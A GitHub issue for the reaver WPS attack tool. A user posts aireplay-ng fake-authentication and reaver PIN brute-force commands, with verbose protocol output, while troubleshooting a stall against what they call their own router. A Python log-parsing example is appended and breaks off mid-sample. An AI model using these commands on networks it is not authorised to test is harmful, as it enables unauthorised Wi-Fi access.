t6x / reaver-wps-fork-t6x


Reaver session gets stuck at "send_packet called from resend_last_packet() send.c:161" #371

Closed mkarne1 closed 1 year ago

mkarne1 commented 1 year ago

Hi there,

my reaver session always gets stuck at "send_packet called from resend_last_packet() send.c:161" while cracking my WPS network with the following settings:

[Screenshot (2023-04-21 11:47:26) of the reaver settings; image not reproduced here]

I'm using:

Reaver version: 1.6.6
Wireless Adapter: Alfa AWUS036ACH
Host OS: macOS BigSur
VMware Fusion with: Linux kali 6.1.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.20-1kali1 (2023-03-22) x86_64 GNU/Linux

Here are the commands that I'm running + their output:

Thanks in advance & best regards!


──(root㉿kali)-[~]
└─# aireplay-ng --fakeauth 100 -a D4:3D:F3:XX:XX:XX -h EA:E1:A1:XX:XX:XX wlan0
11:39:20  Waiting for beacon frame (BSSID: D4:3D:F3:XX:XX:XX) on channel 8

11:39:20  Sending Authentication Request (Open System) [ACK]
11:39:20  Authentication successful
11:39:20  Sending Association Request [ACK]
11:39:20  Association successful :-) (AID: 1)

11:39:34  Got a deauthentication packet! (Waiting 3 seconds)

11:39:37  Sending Authentication Request (Open System) [ACK]
11:39:38  Got a deauthentication packet! (Waiting 5 seconds)

11:39:43  Sending Authentication Request (Open System) [ACK]
11:39:43  Authentication successful
11:39:43  Sending Association Request [ACK]
11:39:43  Got a deauthentication packet! (Waiting 7 seconds)

11:39:50  Sending Authentication Request (Open System) [ACK]
11:39:50  Got a deauthentication packet! (Waiting 9 seconds)

11:39:59  Sending Authentication Request (Open System) [ACK]
11:39:59  Got a deauthentication packet! (Waiting 11 seconds)

11:40:10  Sending Authentication Request (Open System) [ACK]
11:40:10  Got a deauthentication packet! (Waiting 13 seconds)

11:40:23  Sending Authentication Request (Open System) [ACK]
11:40:24  Authentication successful
11:40:24  Sending Association Request [ACK]
11:40:24  Association successful :-) (AID: 1)

11:40:39  Sending keep-alive packet [ACK]
11:40:54  Sending keep-alive packet [ACK]
11:41:09  Sending keep-alive packet [ACK]^C

──(root㉿kali)-[~]
└─# reaver --bssid D4:3D:F3:XX:XX:XX --channel 8 --interface wlan0 -vvv --no-associate

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 8
[?] Restore previous session for D4:3D:F3:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from D4:3D:F3:XX:XX:XX
[+] Received beacon from D4:3D:F3:XX:XX:XX
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: Enrollee MAC Address D4:3D:F3:XX:XX:XX
WPS: Enrollee Nonce - hexdump(len=16): bc 7d a1 e8 88 31 91 ed 25 76 dd 71 48 21 2c 8c
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 59 58 45 4c                                    ZYXEL           
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 RT2860          
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 2c 45 b7 c6 12 06 ae 89 37 a9 89 12 83 57 ab 51
WPS: UUID-R - hexdump(len=16): 38 9f d4 2c db bd 7f 6d 31 89 52 dd cf 67 aa c2
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
DH: public value - hexdump(len=192): 26 b5 91 d1 70 d2 c4 30 d4 cb d5 e5 16 fe ab a4 1a 44 e3 f9 a1 5a 36 20 8a 9e ef 49 66 37 5d f9 25 05 28 0f 06 01 e6 3c 78 85 1b f5 82 78 60 75 35 f1 bc 72 2f 01 0a 30 7e 71 14 b5 ae 52 33 9d 3f 56 a1 2d b1 3f fc 87 90 30 89 b4 d8 4a 5f ec ad d1 28 39 c3 0b 6f 9b a8 c2 27 07 64 94 4e c9 75 a4 9b ba 06 ff 7f be 55 a8 02 b5 a0 9d ad a4 f3 e8 4e 42 56 31 c8 e5 f7 5a 27 40 5d d4 a2 b6 04 fe 71 e8 dc 50 2e 8f de 77 94 3e 0c 34 82 76 c5 d9 b5 1c c2 38 e7 d9 e9 4f 2f 51 7e 3e 4a 0f 92 ec ac ab d2 28 28 41 f6 61 3f 04 04 7e 48 17 f1 01 ed 7c b7 a5 f5 59 79 62 46 08 ce 95 5b 9b
WPS: DH Private Key - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
WPS: DH own Public Key - hexdump(len=192): 26 b5 91 d1 70 d2 c4 30 d4 cb d5 e5 16 fe ab a4 1a 44 e3 f9 a1 5a 36 20 8a 9e ef 49 66 37 5d f9 25 05 28 0f 06 01 e6 3c 78 85 1b f5 82 78 60 75 35 f1 bc 72 2f 01 0a 30 7e 71 14 b5 ae 52 33 9d 3f 56 a1 2d b1 3f fc 87 90 30 89 b4 d8 4a 5f ec ad d1 28 39 c3 0b 6f 9b a8 c2 27 07 64 94 4e c9 75 a4 9b ba 06 ff 7f be 55 a8 02 b5 a0 9d ad a4 f3 e8 4e 42 56 31 c8 e5 f7 5a 27 40 5d d4 a2 b6 04 fe 71 e8 dc 50 2e 8f de 77 94 3e 0c 34 82 76 c5 d9 b5 1c c2 38 e7 d9 e9 4f 2f 51 7e 3e 4a 0f 92 ec ac ab d2 28 28 41 f6 61 3f 04 04 7e 48 17 f1 01 ed 7c b7 a5 f5 59 79 62 46 08 ce 95 5b 9b
WPS: DH Private Key - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
WPS: DH peer Public Key - hexdump(len=192): bd c4 1c 6a 9e 9f 72 fb a1 65 9e 85 24 e7 37 0c 4d be 9c 60 5e 32 57 aa 7a cb ba 37 98 a0 cd 2a c4 9e 33 84 f9 53 a1 be fc 76 88 c7 d3 0f 44 b8 05 45 36 e4 97 9b 68 04 63 84 2e 7e 0c ee c1 4b 14 11 3d 56 f0 84 7a b5 72 9c 40 5d b9 bd fe 87 a8 24 46 9f 58 0a 43 c9 c6 8f 02 2b 39 2b 45 4b bd 1a a7 62 b2 45 d4 50 3a 74 22 ca 6c 85 52 d7 05 7d 9c 43 24 a2 69 8d d3 59 31 38 34 a6 2f 70 4e 6e 6c 72 dc 0f ab 30 84 32 05 6f 00 0c 65 cb 09 ef f6 8c 56 44 ed d8 92 f8 7f 8d 75 bd 8a b0 53 41 1f 3d 7a b9 c6 f5 93 ee 82 ab e7 9d df 9f 7b cb e9 0c 1c 14 5c ae cd c8 6b a0 1e 2b 2e 1d
DH: shared key - hexdump(len=192): 81 ed 5a cb 2d d9 77 ae 4f fa c7 89 47 bb eb 35 5b fe 26 3d 28 d8 d1 af bc 0b a7 f9 63 75 3b 26 f1 6f f8 8a 75 26 e7 ac 03 2c 74 9f 77 1c 77 ca 52 cf 33 62 e3 e1 f7 e8 8a fe bc f5 6c 9c ed 63 11 41 91 dc f6 18 fd 41 f8 b1 3d 64 dd ed 3e 77 7d 66 83 63 57 07 35 d4 c7 f8 cd 1e 1a 4a ac 78 8c 39 fc b1 bc f5 d2 d9 8f ea 21 3d 39 d5 18 66 1a aa 3e 97 d4 e2 bc df 02 f5 8f dc c7 ca bf 16 bc 1c d2 e2 26 11 6d 5d f0 ce b6 7d 01 1a 8b 45 1c a9 cf f1 e7 51 7d ea 45 38 aa e8 10 55 8a 99 be b0 7e 2a 00 97 79 7b e7 2f e6 c2 45 ec aa 34 78 c5 08 8b 43 75 64 0e 47 e7 1f 33 34 e2 e6 49
WPS: DH shared key - hexdump(len=192): 81 ed 5a cb 2d d9 77 ae 4f fa c7 89 47 bb eb 35 5b fe 26 3d 28 d8 d1 af bc 0b a7 f9 63 75 3b 26 f1 6f f8 8a 75 26 e7 ac 03 2c 74 9f 77 1c 77 ca 52 cf 33 62 e3 e1 f7 e8 8a fe bc f5 6c 9c ed 63 11 41 91 dc f6 18 fd 41 f8 b1 3d 64 dd ed 3e 77 7d 66 83 63 57 07 35 d4 c7 f8 cd 1e 1a 4a ac 78 8c 39 fc b1 bc f5 d2 d9 8f ea 21 3d 39 d5 18 66 1a aa 3e 97 d4 e2 bc df 02 f5 8f dc c7 ca bf 16 bc 1c d2 e2 26 11 6d 5d f0 ce b6 7d 01 1a 8b 45 1c a9 cf f1 e7 51 7d ea 45 38 aa e8 10 55 8a 99 be b0 7e 2a 00 97 79 7b e7 2f e6 c2 45 ec aa 34 78 c5 08 8b 43 75 64 0e 47 e7 1f 33 34 e2 e6 49
WPS: DHKey - hexdump(len=32): 29 45 f8 22 8b 9d 38 d3 15 00 18 29 70 a6 7c 16 e5 c0 0c 33 a4 4e ba 49 2e f5 45 df 61 bf 2f b7
WPS: KDK - hexdump(len=32): d2 7e 63 74 b0 c4 4e f8 20 96 e7 21 39 ee 4b 08 c4 59 3d b9 ca 3f 72 f5 50 a3 e2 bd c5 bb 52 31
WPS: AuthKey - hexdump(len=32): 14 cc 24 89 8b 82 f0 b0 b5 b9 e0 aa 5f f7 d6 33 37 d4 b1 42 95 c6 6c 9f 7f da a6 18 6e b8 4b 94
WPS: KeyWrapKey - hexdump(len=16): 1a a0 db 6b 60 b7 04 01 d1 91 e4 ba ed c3 d6 08
WPS: EMSK - hexdump(len=32): 53 3e 4b f8 15 00 1c 4e ff ef 69 b5 f1 2f d1 5c b1 87 bc e8 7f 1f 7a 8b 35 73 eb 19 02 df 2f 13
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 84 d4 6f d4 98 bc 96 b1 19 46 bc 56 92 1c 77 70 80 c8 84 b5 62 4e 2b f0 08 da 9d 11 22 7c 18 9c
WPS: E-Hash2 - hexdump(len=32): 47 84 4a 19 f1 db 4e 01 20 38 22 78 ec 08 24 ed 22 c9 b8 cb 77 36 eb 75 8e 16 67 97 fe 92 80 9a
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 12345670��2�
WPS: Device Password - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: PSK1 - hexdump(len=16): 9d 48 0d 27 c7 75 e3 c2 67 20 18 a3 af 2e ec ce
WPS: PSK2 - hexdump(len=16): d4 0d 0f ac 46 35 32 12 cf ce d1 2e 50 f7 bb d4
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 3f d1 fb 56 12 77 3d 75 9c 34 90 0a 1e 0d 3c ee
WPS: R-S2 - hexdump(len=16): 33 8b d6 89 88 9a 67 77 56 35 5d 0a 57 50 c6 47
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): bc c4 c2 d0 d1 bd 87 56 36 d5 55 a9 99 81 ee 7f d8 9b e3 dc 16 01 39 35 2e b8 f2 b1 07 8e d8 e2
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 98 42 a1 41 aa e8 a4 63 27 ca 9d db d5 a2 e6 31 03 e6 4f ad 14 a3 61 53 f9 92 ed fe 25 f4 78 22
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 18
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     30 30 30 30 35 36 37 38                           00005678        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00005678"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
^Csend_packet called from send_termination() send.c:142

[+] Session saved.
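The posted log is easier to read per PIN attempt than line by line: each `[+] Trying pin` block either ends in a WSC NACK from the AP (Configuration Error 18 is "Device Password Auth Failure" in the WPS specification, and a NACK answering M4 is how reaver learns that the first half of the PIN is wrong) or, as in the second attempt, in a `[+] Received deauth request` followed by nothing but `resend_last_packet()` retries until `Receive timeout occurred`. The Python script below is an added example, not part of reaver or of this thread: it parses a `-vvv` log into per-PIN attempts and labels each outcome. The sample log is a constructed, trimmed excerpt of the output posted above; the function and field names are this example's own.

```python
"""Triage a verbose (-vvv) reaver log: what did each PIN attempt reach?

Added example for this issue, not reaver code. It only reads log text.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Configuration Error codes from the WPS specification (subset).
WPS_CONFIG_ERRORS = {
    0: "No Error",
    15: "Setup Locked",
    16: "Message Timeout",
    17: "Registration Session Timeout",
    18: "Device Password Auth Failure",
}

RE_PIN = re.compile(r'\[\+\] Trying pin "(\d{8})"')
RE_RECV_M = re.compile(r"\[\+\] Received (M\d) message")
RE_SENT_M = re.compile(r"\[\+\] Sending (M\d) message")
RE_NACK = re.compile(r"terminated negotiation with Configuration Error (\d+)")
RE_RESEND = re.compile(r"send_packet called from resend_last_packet\(\)")


@dataclass
class PinAttempt:
    pin: str
    received: List[str] = field(default_factory=list)  # M1, M3, ... from the AP
    sent: List[str] = field(default_factory=list)      # M2, M4, ... we sent
    nack_error: Optional[int] = None                   # WSC NACK config error
    deauths: int = 0
    timeouts: int = 0
    resends_after_deauth: int = 0                      # retries once deauthed


def parse_reaver_log(text: str) -> List[PinAttempt]:
    """Split the log at each "Trying pin" line and tally what happened."""
    attempts: List[PinAttempt] = []
    cur: Optional[PinAttempt] = None
    after_deauth = False
    for line in text.splitlines():
        m = RE_PIN.search(line)
        if m:
            cur = PinAttempt(pin=m.group(1))
            attempts.append(cur)
            after_deauth = False
            continue
        if cur is None:
            continue
        if (m := RE_RECV_M.search(line)):
            cur.received.append(m.group(1))
        elif (m := RE_SENT_M.search(line)):
            cur.sent.append(m.group(1))
        elif (m := RE_NACK.search(line)):
            cur.nack_error = int(m.group(1))
        elif "[+] Received deauth request" in line:
            cur.deauths += 1
            after_deauth = True
        elif "Receive timeout occurred" in line:
            cur.timeouts += 1
        elif after_deauth and RE_RESEND.search(line):
            cur.resends_after_deauth += 1
    return attempts


def classify(a: PinAttempt) -> str:
    """Name the outcome of one attempt in one line."""
    if a.nack_error is not None:
        stage = a.sent[-1] if a.sent else "?"
        reason = WPS_CONFIG_ERRORS.get(a.nack_error, "unknown")
        # Standard reaver logic: NACK after M4 rejects the first PIN half,
        # NACK after M6 rejects the second half.
        half = {"M4": "first half of PIN rejected",
                "M6": "second half of PIN rejected"}.get(stage, "PIN rejected")
        return f"NACK after {stage} (config error {a.nack_error}: {reason}); {half}"
    if a.deauths and not a.received:
        return (f"stalled before M1: {a.deauths} deauth(s), "
                f"{a.resends_after_deauth} resend(s) after deauth, "
                f"{a.timeouts} timeout(s)")
    if a.deauths:
        return f"deauthed mid-exchange after {a.received[-1]}"
    return "incomplete (no NACK, no deauth)"


def summarize(text: str) -> List[str]:
    return [f"{a.pin}: {classify(a)}" for a in parse_reaver_log(text)]


# Constructed excerpt, condensed from the log posted above (resends trimmed).
SAMPLE_LOG = """\
[+] Trying pin "12345670"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received M1 message
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
[+] Received M3 message
[+] Sending M4 message
send_packet called from send_msg() send.c:116
WPS: Enrollee terminated negotiation with Configuration Error 18
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
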